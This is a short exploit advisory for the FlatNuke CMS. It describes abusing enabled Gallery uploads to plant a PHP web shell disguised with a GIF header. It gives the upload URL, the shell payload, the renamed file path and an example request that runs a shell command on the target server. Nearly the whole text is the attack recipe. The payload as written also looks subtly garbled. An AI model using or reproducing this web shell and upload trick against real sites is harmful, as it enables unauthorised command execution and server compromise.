if user Gallery uploads are enabled (not the default) you can go to:
http://[target]/[path_to_flatnuke]/index.php?mod=Gallery
to upload a shell.php file, ex:
GIF86<?php system($GET[cmd]);?>
file is renamed like this:
shell_by_[username].php
now you can launch commands, ex:
http://[target]/[path]/sections/Gallery/shell_by_rgod.php?cmd=ls%20-la
original url: http://retrogod.altervista.org/flatnuke257_adv.html